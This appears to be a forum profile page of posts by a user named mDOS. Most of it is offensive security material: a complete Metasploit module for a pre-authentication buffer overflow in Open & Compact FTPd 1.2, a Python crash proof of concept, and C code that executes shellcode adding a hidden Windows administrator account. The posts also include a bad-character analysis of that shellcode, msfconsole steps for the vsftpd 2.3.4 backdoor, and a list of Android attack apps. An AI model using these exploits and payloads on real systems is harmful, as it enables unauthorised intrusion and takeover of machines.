mDOS

Active Members
  • Posts: 111
  • Days Won: 6

Everything posted by mDOS

  1. The exploit causes the FTP server to crash, so adduser-type payloads are the most effective.

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = AverageRanking

      include Msf::Exploit::Remote::Ftp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow',
          'Description'    => %q{
            This module exploits a stack overflow in the USER verb in Open & Compact
            FTPd version 1.2. The program will crash once the payload is sent, so
            bind shell payloads are not effective.
          },
          'Author'         => 'Blake',
          'License'        => MSF_LICENSE,
          'Version'        => 'Version 1',
          'References'     =>
            [
              [ 'EDB-ID', '11420' ],
              [ 'URL', 'http://www.exploit-db.com/exploits/11420' ],
            ],
          'Privileged'     => true,
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'process',
            },
          'Payload'        =>
            {
              'Space'           => 400,
              'BadChars'        => "\x00\x20\x0a\x0d",
              'StackAdjustment' => -3500,
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x00202c42 } ],
            ],
          'DisclosureDate' => 'Feb 12, 2010',
          'DefaultTarget'  => 0))
      end

      def exploit
        connect

        # Fill built from the target's return address bytes (0x00202c42, little-endian,
        # NUL dropped), followed by a short NOP sled and the encoded payload.
        sploit  = "\x42\x2c\x20" * 199
        sploit << make_nops(10)
        sploit << payload.encoded

        print_status("Trying target #{target.name}...")

        # The overflow goes in the USER argument; PASS only completes the login exchange.
        login  = "USER " + sploit + "\r\n"
        login << "PASS " + rand_text_alphanumeric(12)
        sock.put(login + "\r\n")

        handler
        disconnect
      end
    end
  2. # Title: Open & Compact FTPd Pre-Authentication Crash (PoC)

    #!/usr/bin/python
    # Registers from Immunity Debugger at the crash:
    #
    # EAX FFFFFFFF
    # ECX 00149A29
    # EDX 7C90E4F4 ntdll.KiFastSystemCallRet
    # EBX 00000000
    # ESP 0012FA1C
    # EBP 00000002
    # ESI 0012FA5C
    # EDI 0012FCB4
    # EIP 004113A3
    # C 0  ES 0023 32bit 0(FFFFFFFF)
    # P 1  CS 001B 32bit 0(FFFFFFFF)
    # A 0  SS 0023 32bit 0(FFFFFFFF)
    # Z 0  DS 0023 32bit 0(FFFFFFFF)
    # S 1  FS 003B 32bit 7FFDF000(FFF)
    # T 0  GS 0000 NULL
    # D 0
    # O 0  LastErr ERROR_SUCCESS (00000000)
    # EFL 00010286 (NO,NB,NE,A,S,PE,L,LE)
    # ST0 empty %#.19L
    # ST1 empty -??? FFFF 7C910208 7C90E900
    # ST2 empty -UNORM DCD0 7C9101BB 7C91017B
    # ST3 empty %#.19L
    # ST4 empty +UNORM 00B2 00000000 00000000
    # ST5 empty +UNORM 7D80 77F67D78 01C3DA90
    # ST6 empty -UNORM DD24 00000000 00000409
    # ST7 empty -UNORM E3F4 0014E3F4 0014E3F4
    #                3 2 1 0      E S P U O Z D I
    # FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
    # FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

    import socket

    # 600 bytes of 0x41 0x2C 0x20 in the USER argument are enough to crash the daemon
    buffer = b"\x41\x2C\x20" * 200

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.1.112', 21))
    s.recv(1024)                          # banner
    s.send(b'USER ' + buffer + b'\r\n')
    s.recv(1024)                          # no reply once the server has died
    s.close()
  3. #include <stdio.h>
    #include <string.h>
    #include <windows.h>

    int main(void)
    {
        /* x86 Windows shellcode; the trailing bytes spell the command
           cmd.exe /c net user RubberDuck mudbath /add && net localgroup administrators RubberDuck /add */
        unsigned char shellcode[] =
            "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
            "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
            "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
            "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
            "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
            "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
            "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
            "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
            "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
            "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
            "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
            "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
            "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE"
            "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53"
            "\xFF\xD2\x6A\x05\xEB\x23\xFF\xD0\x68\x65"
            "\x73\x73\x01\x8B\xDF\xFE\x4C\x24\x03\x68"
            "\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54"
            "\xFF\x74\x24\x1C\xFF\x54\x24\x1C\x57\xFF"
            "\xD0\xE8\xD8\xFF\xFF\xFF\x63\x6D\x64\x2E"
            "\x65\x78\x65\x20\x2F\x63\x20\x6E\x65\x74"
            "\x20\x75\x73\x65\x72\x20\x52\x75\x62\x62"
            "\x65\x72\x44\x75\x63\x6B\x20\x6D\x75\x64"
            "\x62\x61\x74\x68\x20\x2F\x61\x64\x64\x20"
            "\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63"
            "\x61\x6C\x67\x72\x6F\x75\x70\x20\x61\x64"
            "\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F"
            "\x72\x73\x20\x52\x75\x62\x62\x65\x72\x44"
            "\x75\x63\x6B\x20\x2F\x61\x64\x64\x00";
        LPVOID lpAlloc;
        void (*pfunc)(void);

        printf("size = %i bytes\n", lstrlenA((LPCSTR)shellcode) + 1);
        printf("-------------------------\nUsername: CEVA\nPassword: CEVA\n");
        system("PAUSE");

        /* RWX page so the copied bytes can be executed */
        lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (lpAlloc == NULL) {
            printf("Memory not allocated!\n");
            return 0;
        }
        memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1);
        pfunc = (void (*)(void))lpAlloc;
        pfunc();
        return 0;
    }

    DON'T FORGET TO REPLACE THAT CEVA WITH SOMETHING
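Added example (my code, not the poster's), tying post 3 back to post 1: the Metasploit module above rejects `\x00 \x20 \x0a \x0d` in its payload because the overflow travels inside a space-delimited, CRLF-terminated FTP command line. The shellcode above is exactly the adduser-style payload post 1 recommends, but this script shows it cannot be sent raw through that channel: it scans the bytes against the module's BadChars list and recovers the command string the shellcode carries. The hex below is a transcription of the `shellcode[]` array above; the bad-character set is the one from the module.

```python
#!/usr/bin/env python3
"""Bad-character scan of the posted adduser shellcode (added example)."""

# Transcribed from the unsigned char shellcode[] array above (279 bytes incl. the final NUL).
SHELLCODE = bytes.fromhex(
    "FC33D2B23064FF325A8B 520C8B52148B722833C9 B11833FF33C0AC3C617C "
    "022C20C1CF0D03F8E2F0 81FF5BBC4A6A8B5A108B 1275DA8B533C03D3FF72 "
    "348B527803D38B722003 F333C941AD03C3813847 65745075F4817804726F "
    "634175EB817808646472 6575E2498B722403F366 8B0C4E8B721C03F38B14 "
    "8E03D3526878656301FE 4C24036857696E455453 FFD26A05EB23FFD06865 "
    "7373018BDFFE4C240368 50726F63684578697454 FF74241CFF54241C57FF "
    "D0E8D8FFFFFF636D642E 657865202F63206E6574 20757365722052756262 "
    "65724475636B206D7564 62617468202F61646420 2626206E6574206C6F63 "
    "616C67726F7570206164 6D696E6973747261746F 72732052756262657244 "
    "75636B202F61646400"
)

# BadChars from the Metasploit module above: NUL, space, LF, CR.
FTP_BADCHARS = b"\x00\x20\x0a\x0d"


def find_bad_chars(payload, bad=FTP_BADCHARS):
    """Return {byte_value: [offsets]} for every forbidden byte present in payload."""
    hits = {}
    for off, value in enumerate(payload):
        if value in bad:
            hits.setdefault(value, []).append(off)
    return hits


def embedded_command(shellcode):
    """Recover the NUL-terminated command string the shellcode hands to WinExec."""
    start = shellcode.index(b"cmd.exe")
    end = shellcode.index(b"\x00", start)
    return shellcode[start:end].decode("ascii")


def is_ftp_safe(payload, bad=FTP_BADCHARS):
    """True only if the payload could be placed in the USER line without encoding."""
    return not find_bad_chars(payload, bad)


if __name__ == "__main__":
    print("length :", len(SHELLCODE))
    print("command:", embedded_command(SHELLCODE))
    for value, offsets in sorted(find_bad_chars(SHELLCODE).items()):
        shown = ", ".join(str(o) for o in offsets[:6])
        more = " ..." if len(offsets) > 6 else ""
        print(f"bad byte 0x{value:02x} at offsets {shown}{more}")
    print("usable raw in the USER line:", is_ftp_safe(SHELLCODE))
```

The hits are not only in the command string: offset 32 is the `0x20` immediate of the `sub al, 0x20` lower-casing step, offset 35 is the `0x0d` rotate count of `ror edi, 0x0d` in the hash loop, and the final `0x00` terminates the command. Any of those would end or split the FTP line early, which is why the module runs the payload through an encoder rather than sending bytes like these as-is.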
  4. Would it work if I play the poor guy so you give me those 30 lei??
  5. I don't think you can do that, because the NOKIA battery is smaller than an external battery, and even if you managed to do it, I don't think it would charge more than 3 percent.
  6. What we need:
    -Linux
    -Metasploit Framework
    1. Open the terminal or shell and type "msfconsole" in it. (https://imgur.com/a/ZxWjcoM)
    This is the backdoor module we will use in the tutorial: "exploit/unix/ftp/vsftpd_234_backdoor"
    2. use exploit/unix/ftp/vsftpd_234_backdoor
    3. set RHOST <victim/server IP> (this command sets the victim's/server's host)
    4. exploit (runs the exploit)
    This is roughly what our attack should look like: https://imgur.com/yTmv7AM
    WARNING: This exploit was tested on a virtual machine (Metasploitable)
  7. mDOS

    Shellcode?

    We'll make it tonight.
  8. mDOS

    Shellcode?

    Do you want me to make a tutorial on how to make shellcode on a phone??
  9. To start, download the "TERMUX" app. LINK>https://play.google.com/store/apps/details?id=com.termux
    SHELLS:
    >Bash
    >Fish
    >IPython
    >Tcsh
    >Xonsh
    >zsh
    ----------------------------------------
    Installation tutorial for FISH:
    1. termux-setup-storage
    2. pkg install fish
    3. To run it, type fish
    ------------------------------------------
    The other shells are installed similarly to the one above.
    GOOD LUCK
  10. You mean you want to use an old Nokia as an external battery, right?
  11. What we need:
    -Android phone 4.0+
    -root
    Useful apps:
    -zANTI
    -dsploit/csploit
    -droidsheep
    I used the zANTI app the most because it has a very easy-to-use interface and can be handy for anyone.
    zANTI link>https://www.zimperium.com/zanti-mobile-penetration-testing
    droidsheep link>http://droidsheep.downloadxapp.com/
    dsploit link>https://www.apksum.com/app/dsploit/it.evilsocket.dsploit